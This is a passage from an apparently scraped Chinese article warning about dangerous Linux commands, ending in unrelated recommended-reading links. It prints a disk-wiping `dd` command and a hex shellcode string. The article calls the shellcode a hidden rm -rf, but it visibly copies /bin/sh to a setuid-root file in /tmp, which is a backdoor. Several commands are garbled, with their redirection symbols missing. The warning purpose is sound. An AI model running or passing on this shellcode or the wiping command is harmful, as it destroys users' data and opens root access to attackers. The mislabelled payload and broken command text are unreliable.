7.file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出 。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了 。另外,我想你可能真正想用的是 “” , 即累加新的输出到文件 , 而不是刷新那个文件 。) 。如果用上列执行时输入错误或无知的输入类似 “xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件 。
8. ^foo^bar
这个命令在“鲜为人知而又实用的 Linux 命令大全:”中描述过,用来编辑先前运行的命令而无需重打整个命令 。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦 。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧 。)
9. dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据 。当然!你的系统可能陷入混乱和不可恢复的状态 。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见 , 你可以覆写多次 。)
10. 隐藏命令
下面的命令其实就是上面第一个命令 (rm -rf) 。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄 。在终端里运行下面命令可能会擦除你的根分区 。
这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到 。你必须时刻留心你在做什么结果会怎样 。不要编译/运行从未知来源的代码 。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令,因为这将导致数据丢失或者系统崩溃 。如果你想测试它们 , 请在虚拟机上运行 。
;
关于linux渗透攻击命令和msf渗透linux的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站 。
推荐阅读
- .net将文件保存为pdf,net 文件
- vb连接mysql数据库api函数,vbs连接mysql数据库
- 带货视频号的简介怎么写,带货视频号的简介怎么写好
- redis和CPU的关系,redis和guava
- 编程语言排行榜go 编程语言排行榜2021
- 光猫怎么接两个路由器,光猫怎么接两个路由器的网线
- 如何合并多个excel,如何合并多个excel文件到一个Excel中
- 角色扮演的策略塔防游戏,角色扮演类塔防
- mysql二级是怎么考的 mysql二级证书